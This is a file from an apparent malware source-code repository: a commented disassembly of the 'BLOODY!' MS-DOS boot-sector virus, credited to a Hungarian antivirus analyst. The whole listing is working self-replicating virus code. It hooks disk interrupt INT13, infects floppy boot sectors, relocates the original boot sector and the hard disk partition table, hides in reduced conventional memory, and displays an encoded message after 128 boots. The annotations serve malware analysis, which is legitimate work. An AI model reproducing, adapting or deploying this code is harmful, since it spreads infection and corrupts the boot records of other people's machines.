MalwareSourceCode/MSDOS/B-Index/Virus.MSDOS.Unknown.bloody.asm

281 lines
10 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; BLOODY! virus
;
; Discovered an commented by Ferenc Leitold
; Hungarian VirusBuster Team
; Address: 1399 Budapest
; P.O. box 701/349
; HUNGARY
217D:0100 2EFF2E177C JMP Far CS:[7C17]
217D:0105 E9B500 JMP 01BD ; Jump to main entry point
217D:0108 00 db 0 ; Counter
217D:0109 00 db 0
217D:010A 00 db 0 ; Flag:
; 00 : floppy
; 80 : hard disk
217D:010B 00 db 0
217D:010C A100F0 MOV AX,[F000]
217D:010F 0301809F DW 0103H,9F80H ; Entry point at TOP
217D:0113 007C0000 DW 7C00H,0000H ; Address of orig. boot
217D:0117 057C0000 DW 7C05H,0000H
217D:011B 00000000 DW 0000H,0000H ; original INT13 vector
;************************ INT13 entry point *****************************
217D:011F 80FC02 CMP AH,02 ; Check parameters
217D:0122 720D JC 0131
217D:0124 80FC04 CMP AH,04
217D:0127 7308 JNC 0131
217D:0129 80FA80 CMP DL,80
217D:012C 7303 JNC 0131
217D:012E E80500 CALL 0136 ; Call, if AH=2,3 & DL!=80
217D:0131 2EFF2E0B00 JMP Far CS:[000B] ; Jump to original INT13
217D:0136 50 PUSH AX ; Save registers
217D:0137 53 PUSH BX
217D:0138 51 PUSH CX
217D:0139 52 PUSH DX
217D:013A 06 PUSH ES
217D:013B 1E PUSH DS
217D:013C 56 PUSH SI
217D:013D 57 PUSH DI
217D:013E 0E PUSH CS ; Set DS,ES to CS
217D:013F 1F POP DS
217D:0140 0E PUSH CS
217D:0141 07 POP ES
217D:0142 BE0200 MOV SI,0002 ; 2 probe
217D:0145 33C0 XOR AX,AX ; Reset drive
217D:0147 9C PUSHF
217D:0148 FF1E0B00 CALL Far [000B] ; Call INT13
217D:014C B80102 MOV AX,0201 ; Read boot sector of floppy
217D:014F BB0002 MOV BX,0200
217D:0152 B90100 MOV CX,0001
217D:0155 32F6 XOR DH,DH
217D:0157 9C PUSHF
217D:0158 FF1E0B00 CALL Far [000B] ; Call INT13
217D:015C 7305 JNC 0163
217D:015E 4E DEC SI ; If error next probe
217D:015F 75E4 JNZ 0145
217D:0161 EB2E JMP 0191 ; Jump, if 2 bad probes was
217D:0163 33F6 XOR SI,SI ; Check boot sector, if
217D:0165 BF0002 MOV DI,0200 ; if infected yet
217D:0168 B90300 MOV CX,0003
217D:016B FC CLD
217D:016C F3A7 REP CMPSW
217D:016E 7421 JZ 0191 ; Jump, if already infected
217D:0170 B80103 MOV AX,0301 ; Write orig. boot sector
217D:0173 BB0002 MOV BX,0200
217D:0176 B90300 MOV CX,0003 ; cyl: 0 sect: 3
217D:0179 B601 MOV DH,01 ; head: 1
217D:017B 9C PUSHF
217D:017C FF1E0B00 CALL Far [000B] ; Call INT13
217D:0180 720F JC 0191
217D:0182 B80103 MOV AX,0301 ; Write infected boot sector
217D:0185 33DB XOR BX,BX
217D:0187 B90100 MOV CX,0001 ; cyl:0 sect:1
217D:018A 32F6 XOR DH,DH ; head: 0
217D:018C 9C PUSHF
217D:018D FF1E0B00 CALL Far [000B]
217D:0191 5F POP DI ; Restore registers
217D:0192 5E POP SI
217D:0193 1F POP DS
217D:0194 07 POP ES
217D:0195 5A POP DX
217D:0196 59 POP CX
217D:0197 5B POP BX
217D:0198 58 POP AX
217D:0199 C3 RET
217D:019A 1D1D1D1A3737 ; Coded text:
217D:01A0 37373737557B ; "\r\r\r\n Bloody! Jun. 4, 1989\r\r\r\n"
217D:01A6 7878736E3637
217D:01AC 5D6279393723
217D:01B2 3B37262E2F2E
217D:01B8 1D1D1D1A00
;************************** Main entry point *******************************
217D:01BD 33C0 XOR AX,AX
217D:01BF 8ED8 MOV DS,AX
217D:01C1 FA CLI
217D:01C2 8ED0 MOV SS,AX
217D:01C4 BC007C MOV SP,7C00
217D:01C7 FB STI
217D:01C8 A14C00 MOV AX,[004C] ; Save orig. INT13 vector
217D:01CB A30B7C MOV [7C0B],AX
217D:01CE A14E00 MOV AX,[004E]
217D:01D1 A30D7C MOV [7C0D],AX
217D:01D4 A11304 MOV AX,[0413] ; Decrease memory by 2KB
217D:01D7 48 DEC AX
217D:01D8 48 DEC AX
217D:01D9 A31304 MOV [0413],AX
217D:01DC B106 MOV CL,06 ; Calculate segment
217D:01DE D3E0 SHL AX,CL
217D:01E0 A3117C MOV [7C11],AX
217D:01E3 A34E00 MOV [004E],AX ; Set new INT13 vector
217D:01E6 8EC0 MOV ES,AX
217D:01E8 B81F00 MOV AX,001F
217D:01EB A34C00 MOV [004C],AX
217D:01EE C7060F7C0301 MOV [7C0F],0103 ; Set JMP argument points
; to TOP
217D:01F4 BE007C MOV SI,7C00 ; Copy itself to TOP
217D:01F7 33FF XOR DI,DI
217D:01F9 B90001 MOV CX,0100
217D:01FC FC CLD
217D:01FD F3A5 REP MOVSW
217D:01FF FF2E0F7C JMP Far [7C0F] ; Jmp to TOP
TOP :0203 33C0 XOR AX,AX ; Reset drive
TOP :0205 CD13 INT 13
TOP :0207 0E PUSH CS ; Set registers to load
TOP :0208 1F POP DS ; original sector
TOP :0209 33C0 XOR AX,AX
TOP :020B 8EC0 MOV ES,AX
TOP :020D B80102 MOV AX,0201
TOP :0210 BB007C MOV BX,7C00
TOP :0213 803E0A0000 CMP [000A],00 ; Check, if it is floppy ?
TOP :0218 7435 JZ 024F ; Jump, if floppy
; if hard disk, load
; orig. part. table
TOP :021A B90600 MOV CX,0006 ; cyl.: 0 sect.: 6
TOP :021D BA8000 MOV DX,0080 ; head: 0
TOP :0220 CD13 INT 13
TOP :0222 0E PUSH CS
TOP :0223 07 POP ES
TOP :0224 FE060800 INC B/[0008] ; Increase counter
TOP :0228 803E080080 CMP [0008],80
TOP :022D 721E JC 024D ; If counter < 128 -> no text
TOP :022F C60608007A MOV [0008],7A
TOP :0234 FC CLD
TOP :0235 BE9A00 MOV SI,009A ; Write coded text via BIOS
TOP :0238 AC LODSB
TOP :0239 3C00 CMP AL,00
TOP :023B 740C JZ 0249
TOP :023D 32060300 XOR AL,[0003]
TOP :0241 B40E MOV AH,0E
TOP :0243 B700 MOV BH,00
TOP :0245 CD10 INT 10
TOP :0247 EBEF JMP 0238
TOP :0249 B400 MOV AH,00 ; Wait for keystroke
TOP :024B CD16 INT 16
TOP :024D EB54 JMP 02A3
; if floppy
TOP :024F B90300 MOV CX,0003 ; read orig. boot sector
TOP :0252 BA0001 MOV DX,0100 ; cyl: 0 hd: 1 sect: 3
TOP :0255 CD13 INT 13
TOP :0257 0E PUSH CS
TOP :0258 07 POP ES
TOP :0259 721D JC 0278 ; Jump, if error occured
TOP :025B B80102 MOV AX,0201 ; Load part. table of
TOP :025E BB0002 MOV BX,0200 ; 1st hard disk
TOP :0261 B90100 MOV CX,0001
TOP :0264 BA8000 MOV DX,0080
TOP :0267 CD13 INT 13
TOP :0269 720D JC 0278 ; Jump, if error occured
TOP :026B BE0002 MOV SI,0200 ; Check 1st 3 word
TOP :026E 33FF XOR DI,DI
TOP :0270 B90300 MOV CX,0003
TOP :0273 FC CLD
TOP :0274 F3A7 REP CMPSW
TOP :0276 750E JNZ 0286
; If infected yet
TOP :0278 C6060A0000 MOV [000A],00 ; Set Flag to 0
TOP :027D C606080000 MOV [0008],00 ; Reset counter
TOP :0282 FF2E1300 JMP Far [0013] ; Jump to orig. boot
TOP :0286 B80103 MOV AX,0301 ; Write orig. part. table
TOP :0289 BB0002 MOV BX,0200
TOP :028C B90600 MOV CX,0006 ; cyl: 0 sect: 6 hd: 0
TOP :028F CD13 INT 13
TOP :0291 72E5 JC 0278
TOP :0293 BEBE03 MOV SI,03BE ; Copy partition info
TOP :0296 BFBE01 MOV DI,01BE ; after virus body
TOP :0299 B92101 MOV CX,0121
TOP :029C F3A5 REP MOVSW
TOP :029E C6060A0001 MOV [000A],01
TOP :02A3 B80103 MOV AX,0301 ; Write boot sector or
; partition table with
; increased counter
TOP :02A6 33DB XOR BX,BX
TOP :02A8 B90100 MOV CX,0001
TOP :02AB CD13 INT 13
TOP :02AD BEBE04 MOV SI,04BE ; Clear area of partition
TOP :02B0 BFBE01 MOV DI,01BE ; info
TOP :02B3 B92000 MOV CX,0020
TOP :02B6 F3A5 REP MOVSW
TOP :02B8 EBBE JMP 0278 ; Set parameters &
; jump to orig. boot
TOP :02BA DE07 ESC 30,[BX]
TOP :02BC DF07 ESC 38,[BX]
TOP :02BE 0000 ADD [BX+SI],AL
TOP :02C0 0000 ADD [BX+SI],AL
TOP :02C2 0000 ADD [BX+SI],AL
TOP :02C4 0000 ADD [BX+SI],AL
TOP :02C6 0000 ADD [BX+SI],AL
TOP :02C8 0000 ADD [BX+SI],AL
TOP :02CA 0000 ADD [BX+SI],AL
TOP :02CC 0000 ADD [BX+SI],AL
TOP :02CE 0000 ADD [BX+SI],AL
TOP :02D0 0000 ADD [BX+SI],AL
TOP :02D2 0000 ADD [BX+SI],AL
TOP :02D4 0000 ADD [BX+SI],AL
TOP :02D6 0000 ADD [BX+SI],AL
TOP :02D8 0000 ADD [BX+SI],AL
TOP :02DA 0000 ADD [BX+SI],AL
TOP :02DC 0000 ADD [BX+SI],AL
TOP :02DE 0000 ADD [BX+SI],AL
TOP :02E0 0000 ADD [BX+SI],AL
TOP :02E2 0000 ADD [BX+SI],AL
TOP :02E4 0000 ADD [BX+SI],AL
TOP :02E6 0000 ADD [BX+SI],AL
TOP :02E8 0000 ADD [BX+SI],AL
TOP :02EA 0000 ADD [BX+SI],AL
TOP :02EC 0000 ADD [BX+SI],AL
TOP :02EE 0000 ADD [BX+SI],AL
TOP :02F0 0000 ADD [BX+SI],AL
TOP :02F2 0000 ADD [BX+SI],AL
TOP :02F4 0000 ADD [BX+SI],AL
TOP :02F6 0000 ADD [BX+SI],AL
TOP :02F8 0000 ADD [BX+SI],AL
TOP :02FA 0000 ADD [BX+SI],AL
TOP :02FC 0000 ADD [BX+SI],AL
TOP :02FE 55 PUSH BP
TOP :02FF AA STOSB